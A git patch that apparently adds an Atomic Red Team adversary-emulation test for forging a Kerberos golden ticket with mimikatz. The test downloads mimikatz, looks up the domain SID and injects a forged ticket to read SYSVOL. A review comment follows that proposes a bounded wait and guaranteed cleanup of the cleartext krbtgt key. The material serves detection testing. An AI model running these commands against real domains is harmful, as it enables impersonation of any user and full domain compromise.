From d50239ff5721d7bf967a1c96985e314585ade2fa Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Cl=C3=A9ment=20Notin?=
Date: Wed, 6 Jan 2021 19:35:14 +0100
Subject: [PATCH] T1558.001: add test "Golden ticket" (#1351)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* T1558.001: add test "Golden ticket"
Co-authored-by: Zakaria Addi
Co-authored-by: Clément Notin
* Add support for default domain SID (one less parameter to specify)
With default: invoke-atomictest T1558.001 -InputArgs @{ "domain" = "lab.lan" ; "krbtgt_aes256_key"="xxxxx" } [...] mimikatz(commandline) # kerberos::golden /domain:lab.lan /sid:S-1-5-21-1891480667-311803191-3341389180 /aes256:xxxxx /user:goldenticketfakeuser /ptt With specific SID ("toto"): invoke-atomictest T1558.001 -InputArgs @{ "domain" = "lab.lan" ; "krbtgt_aes256_key"="xxxxx" ; "domain_sid"="toto" } [...] mimikatz(commandline) # kerberos::golden /domain:lab.lan /sid:toto /aes256:xxxxx /user:goldenticketfakeuser /ptt
Co-authored-by: Zakaria Addi
---
 atomics/T1558.001/T1558.001.yaml | 100 +++++++++++++++++++++++++++++++
 1 file changed, 100 insertions(+)
 create mode 100644 atomics/T1558.001/T1558.001.yaml
diff --git a/atomics/T1558.001/T1558.001.yaml b/atomics/T1558.001/T1558.001.yaml
new file mode 100644
index 00000000..2c5ba55e
--- /dev/null
+++ b/atomics/T1558.001/T1558.001.yaml
@@ -0,0 +1,100 @@
+attack_technique: T1558.001
+display_name: 'Steal or Forge Kerberos Tickets: Golden Ticket'
+atomic_tests:
+- name: Crafting golden tickets with mimikatz
+ auto_generated_guid: 9726592a-dabc-4d4d-81cd-44070008b3af
+ description: |
+ Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the domain.
+ This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769).
+ The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session.
+ supported_platforms:
+ - windows
+ input_arguments:
+ domain_sid:
+ description: SID of the targeted domain, if you keep default it will automatically get the current domain SID
+ type: string
+ default: S-1-5-21-DEFAULT
+ domain:
+ description: Targeted domain FQDN
+ type: string
+ default: example.com
+ account:
+ description: Account to impersonate
+ type: string
+ default: goldenticketfakeuser
+ krbtgt_aes256_key:
+ description: Krbtgt AES256 key
+ type: string
+ default: b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
+ mimikatz_path:
+ description: Mimikatz windows executable
+ type: path
+ default: '$env:TEMP\mimikatz\x64\mimikatz.exe'
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})
+ prereq_command: |
+ $mimikatz_path = cmd /c echo #{mimikatz_path}
+ if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
+ get_prereq_command: |
+ $mimikatz_path = cmd /c echo #{mimikatz_path}
+ Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+ Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
+ New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
+ Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore
+ Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore
+
+ # get current domain SID if default was used
+ $domain_sid = "#{domain_sid}"
+ If ($domain_sid -Match "DEFAULT") {
+ # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60
+ $domain = gwmi Win32_ComputerSystem | Select -Expand Domain
+ $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value
+ $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))
+ }
+
+ # create batch file with commands to run in a separate "runas /netonly" session
+ # so we don't purge Kerberos ticket from the current Windows session
+ # its output goes to golden.txt temp file, because we cannot capture "runas /netonly" output otherwise
+ @"
+ >%TEMP%\golden.txt 2>&1 (
+ echo Purge existing tickets and create golden ticket:
+ klist purge
+ #{mimikatz_path} "kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{krbtgt_aes256_key} /user:#{account} /ptt" "exit"
+
+ echo.
+ echo Requesting SYSVOL:
+ dir \\#{domain}\SYSVOL
+
+ echo.
+ echo Tickets after requesting SYSVOL:
+ klist
+
+ echo.
+ echo End of Golden Ticket attack
+ )
+ "@ -Replace "DOMAIN_SID", $domain_sid | Out-File -Encoding OEM $env:TEMP\golden.bat
+
+ # run batch file in a new empty session (password and username do not matter)
+ echo "foo" | runas /netonly /user:fake "$env:TEMP\golden.bat" | Out-Null
+
+ # wait until the output file has logged the entire attack
+ do {
+ Start-Sleep 1 # wait a bit so the output file has time to be created
+ Get-Content -Path "$env:TEMP\golden.txt" -Wait | ForEach-Object {
+ if ($_ -match 'End of Golden Ticket attack') { break }
+ }
+ } while ($false) # dummy loop so that 'break' can be used
+
+ # show output from new empty session
+ Get-Content $env:TEMP\golden.txt
+
+ # cleanup temp files
+ Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore
+ Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore
\ No newline at end of file
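Review bot: The wait loop in the executor `command` block (`do { … Get-Content -Wait … } while ($false)`) has no upper bound, so when `runas` or mimikatz fails before the batch file prints `End of Golden Ticket attack` (wrong key, runas blocked by policy, golden.txt never created) the test presumably either blocks forever on `Get-Content -Wait` or, if golden.txt does not exist after the one-second sleep, drops out of the loop with an error and runs the final `Get-Content` on a missing file. On either path the trailing `Remove-Item` cleanup can be skipped, and `golden.bat` then stays in `%TEMP%` holding the krbtgt AES256 key in clear text. I would put the wait behind a deadline and move the cleanup into a `finally` so the key material is removed on every exit path, with a `Write-Warning` on timeout so the operator knows the expected 4769 event was likely never generated. The `description` could also state that the key is written to a batch file on disk and appears on the mimikatz command line, which is what 4688/Sysmon-based detections will see.

```powershell
# … unchanged: domain SID lookup, batch file generation and the runas launch …
try {
  # bounded wait: a failed runas/mimikatz run never writes the sentinel line
  $deadline = (Get-Date).AddSeconds(60)
  do {
    Start-Sleep 1
    $done = (Test-Path "$env:TEMP\golden.txt") -and
            (Select-String -Path "$env:TEMP\golden.txt" -Pattern 'End of Golden Ticket attack' -Quiet)
  } until ($done -or (Get-Date) -gt $deadline)
  if (-not $done) { Write-Warning "Timed out waiting for golden.txt; runas/mimikatz output may be incomplete" }

  # show output from new empty session
  Get-Content $env:TEMP\golden.txt -ErrorAction Ignore
} finally {
  # always remove the batch file: it contains the krbtgt AES256 key in clear text
  Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore
  Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore
}
```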